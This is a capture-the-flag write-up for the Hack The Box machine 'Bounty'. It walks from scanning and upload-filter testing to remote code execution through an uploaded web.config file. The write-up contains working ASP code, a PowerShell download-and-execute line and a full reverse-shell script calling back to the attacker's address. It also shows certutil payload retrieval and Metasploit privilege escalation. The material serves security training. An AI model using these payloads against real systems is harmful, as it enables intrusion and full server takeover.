Bounty
Contents
Ports scan
masscan found only port 80
root@kali:~/HTB/Machines/Bounty# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.93 --rate=1000
Starting masscan 1.0.5 at 2019-11-30 14:50:52 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.93
nmap
root@kali:~/HTB/Machines/Bounty# nmap -sC -sV 10.10.10.93 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 19:02 EST Nmap scan report for bounty.htb (10.10.10.93) Host is up (0.044s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
IIS 7.5 was included in Windows 7 and Windows Server 2008 R2.
Web enumeration
Main page
root@kali:~/HTB/Machines/Bounty# curl -v http://10.10.10.93/ * Trying 10.10.10.93:80... * TCP_NODELAY set * Connected to 10.10.10.93 (10.10.10.93) port 80 (#0) > GET / HTTP/1.1 > Host: 10.10.10.93 > User-Agent: curl/7.66.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Content-Type: text/html < Last-Modified: Thu, 31 May 2018 03:46:26 GMT < Accept-Ranges: bytes < ETag: "20ba8ef391f8d31:0" < Server: Microsoft-IIS/7.5 < X-Powered-By: ASP.NET < Date: Sun, 01 Dec 2019 00:32:01 GMT < Content-Length: 630 < <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Bounty</title> <style type="text/css"> <!-- body { color:#000000; background-color:#B3B3B3; margin:0; }
#container { margin-left:auto; margin-right:auto; text-align:center; }
a img { border:none; }
--> </style> </head> <body> <div id="container"> <a href=""><img src="merlin.jpg" alt="IIS7" width="571" height="411" /></a> </div> </body> * Connection #0 to host 10.10.10.93 left intact </html>
The image doesn't give more information.
root@kali:~/HTB/Machines/Bounty# wget http://bounty.htb/merlin.jpg --2019-11-30 10:08:28-- http://bounty.htb/merlin.jpg Resolving bounty.htb (bounty.htb)... 10.10.10.93 Connecting to bounty.htb (bounty.htb)|10.10.10.93|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 780732 (762K) [image/jpeg] Saving to: ‘merlin.jpg’
merlin.jpg 100%[===================>] 762.43K 1.69MB/s in 0.4s
2019-11-30 10:08:28 (1.69 MB/s) - ‘merlin.jpg’ saved [780732/780732] root@kali:~/HTB/Machines/Bounty# strings merlin.jpg
Dirsearch
The first search only with extensions txt and folders and big file to find the structure.
root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.93 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-20-05.log
Target: http://10.10.10.93
[10:20:05] Starting: [10:21:42] 403 - 1KB - /UploadedFiles/ [10:22:00] 403 - 1KB - /uploadedFiles/ [10:23:23] 403 - 1KB - /uploadedfiles/
Task Completed
There is a folder uploadedfiles. The second iteration with more extensions, but smaller file.
root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e "php,asp,aspx,js" -f -t 1000 -u http://10.10.10.93 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, js | HTTP method: get | Threads: 1000 | Wordlist size: 438229
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-35-30.log
Target: http://10.10.10.93
[10:35:30] Starting: [10:36:06] 200 - 974B - /transfer.aspx [10:36:29] 400 - 11B - /%2Acheckout%2A.aspx [10:37:28] 400 - 11B - /%2Adocroot%2A.aspx [10:37:46] 400 - 11B - /%2A.aspx [10:38:12] 400 - 11B - /http%3A%2F%2Fwww.aspx [10:39:04] 400 - 11B - /q%26a.aspx [10:39:06] 400 - 11B - /http%3A.aspx [10:39:49] 400 - 11B - /%2A%2Ahttp%3a.aspx [10:39:56] 403 - 1KB - /UploadedFiles/ [10:40:25] 403 - 1KB - /uploadedFiles/ [10:41:27] 400 - 11B - /%2Ahttp%3A.aspx [10:42:39] 400 - 11B - /%2A%2Ahttp%3A.aspx [10:42:54] 403 - 1KB - /uploadedfiles/ [10:43:20] 400 - 11B - /http%3A%2F%2Fyoutube.aspx [10:43:21] 400 - 11B - /http%3A%2F%2Fblogs.aspx [10:43:22] 400 - 11B - /http%3A%2F%2Fblog.aspx [10:44:44] 400 - 11B - /%2A%2Ahttp%3A%2F%2Fwww.aspx
Task Completed
File upload
The transfer.aspx shows a form to upload files.
We do a test with a gif file.
The file is uploaded successfully.
We find the file at the URI /uploadedfiles/test.gif
We try to upload an aspx file.
root@kali:~/HTB/Machines/Bounty# echo test > test.aspx
But as expected, this extension is not allowed.
Determine allowed extensions
The web page https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN provide the list of file extensions managed by IIS7.
root@kali:~/HTB/Machines/Bounty# curl -q "https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN" 2>/dev/null | grep "<td><p>\..*</p></td>" | cut -d '>' -f 3 | cut -d '<' -f 1 | sed 's/, /\n/g' | cut -c 2- > extensions.lst root@kali:~/HTB/Machines/Bounty# cat extensions.lst asax ascx ashx asmx aspx axd browser cd compile config cs vb csproj vbproj disco vsdisco dsdgm dsprototype dll licx webinfo master mdb ldb mdf msgx svc resources resx sdm sdmDocument sitemap skin sln soap asa cdx cer idc shtm shtml stm css htm html jpg jpeg png tiff bmp svg gif ico tga xcf dwg pdf root@kali:~/HTB/Machines/Bounty# echo test > test.txt
We upload a test file.
We intercept the request, and we send it to Intruder module.
Clear the fields, and select the file extension as payload.
Load the extensions as payload from file.
Fetch results that are between ''<span id="Label1" style="color:'' and ''</span>''
Run the attack, and we can see the text "File Uploaded successfully." from admitted extensions.
Order the results by successful extensions.
We can update file with these extensions:
- config
- jpg
- jpeg
- png
- gif
RCE with web.config
Soroush Dalili's article explains how to execute remote code from a web.config page.
Test
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(3+4)
Response.write("<!-"&"-")
%>
-->
The code is executed, because it executed the command, and printed 7 not 3+4.
Execute systeminfo
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments>
</requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->
Gain a reverse shell
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments>
</requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/rs.ps1')")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->
The web.config will download the file rs.ps1 and execute it.
root@kali:~/HTB/Machines/Bounty# cat rs.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Open the web server
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Open the listener
root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Browse the URL
The file rs.ps1 is downloaded
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
And a reverse powershell is opened at the same moment.
root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.93. Ncat: Connection from 10.10.10.93:49158. whoami bounty\merlin PS C:\windows\system32\inetsrv>
User flag
PS C:\windows\system32\inetsrv> cd C:\ PS C:\> cd Users\merlin\Desktop PS C:\Users\merlin\Desktop> cat user.txt <USER_FLAG>
User escalation
Reverse meterpreter
Create the reverse meterpreter.
root@kali:~/HTB/Machines/Bounty# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.34 LPORT=5555 -f exe -o metasploit.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 206403 bytes Final size of exe file: 212992 bytes Saved as: metasploit.exe
Check if the web server is listening. And launch the command certutl to upload the file.
PS C:\windows\system32\inetsrv> cd c:\users\merlin PS C:\users\merlin> certutil -urlcache -split -f "http://10.10.14.34/metasploit.exe" metasploit.exe **** Online **** 000000 ... 034000 CertUtil: -URLCache command completed successfully.
The web server registers the upload twice.
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:38] "GET /metasploit.exe HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:39] "GET /metasploit.exe HTTP/1.1" 200 -
Run the metasploit console, and run the listener on port 5555
root@kali:~/HTB/Machines/Bounty# msfconsole msf5 > use multi/handler msf5 exploit(multi/handler) > set LHOST 10.10.14.34 LHOST => 10.10.14.34 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.34:5555
Start the reverse meterpreter.
PS C:\users\merlin> cmd /c metasploit.exe
And the meterpreter opens
[*] Sending stage (180291 bytes) to 10.10.10.93 [*] Meterpreter session 1 opened (10.10.14.34:5555 -> 10.10.10.93:49171) at 2019-12-03 11:20:35 -0500
meterpreter > getuid Server username: BOUNTY\merlin
Exploit to escalate
The meterpreter is opened as merlin, now we need to escalate.
meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > search suggester
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows... [*] 10.10.10.93 - 13 exploit checks are being tried... [+] 10.10.10.93 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Post module execution completed msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator msf5 exploit(windows/local/ms10_092_schelevator) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.34 LHOST => 10.10.14.34 msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 6666 LPORT => 6666 msf5 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 10.10.14.34:6666 [*] Preparing payload at C:\Windows\TEMP\TKeIxip.exe [*] Creating task: RT4ADIUWBKw89 [*] SUCCESS: The scheduled task "RT4ADIUWBKw89" has successfully been created. [*] SCHELEVATOR [*] Reading the task file contents from C:\Windows\system32\tasks\RT4ADIUWBKw89... [*] Original CRC32: 0xfc4dee90 [*] Final CRC32: 0xfc4dee90 [*] Writing our modified content back... [*] Validating task: RT4ADIUWBKw89 [*] [*] Folder: \ [*] TaskName Next Run Time Status [*] ======================================== ====================== =============== [*] RT4ADIUWBKw89 1/1/2020 8:47:00 AM Ready [*] SCHELEVATOR [*] Disabling the task... [*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed. [*] SCHELEVATOR [*] Enabling the task... [*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed. [*] SCHELEVATOR [*] Executing the task... [*] Sending stage (180291 bytes) to 10.10.10.93 [*] SUCCESS: Attempted to run the scheduled task "RT4ADIUWBKw89". [*] SCHELEVATOR [*] Deleting the task... [*] Meterpreter session 2 opened (10.10.14.34:6666 -> 10.10.10.93:49163) at 2019-12-02 01:47:08 -0500 [*] SUCCESS: The scheduled task "RT4ADIUWBKw89" was successfully deleted. [*] SCHELEVATOR
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
The host is vulnerable to a lot of exploits (because is not patched). I stopped after 3 exploits.
msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions
Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows BOUNTY\merlin @ BOUNTY 10.10.14.34:5555 -> 10.10.10.93:49161 (10.10.10.93) 2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ BOUNTY 10.10.14.34:6666 -> 10.10.10.93:49163 (10.10.10.93) 3 shell x64/windows Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation... 10.10.14.34:7777 -> 10.10.10.93:49165 (10.10.10.93) 4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ BOUNTY 10.10.14.34:8888 -> 10.10.10.93:49183 (10.10.10.93)
Root Flag
meterpreter > shell Process 284 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users cd C:\Users
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT_FLAG>
References
- Internet Information Services
- ASP.NET Web Project File Types
- RCE by uploading a web.config
- Upload a web.config File for Fun & Profit
- Reverse Shell Cheat Sheet
- you can download files with certutil
Daniel Simao 18:53, 30 November 2019 (EST)
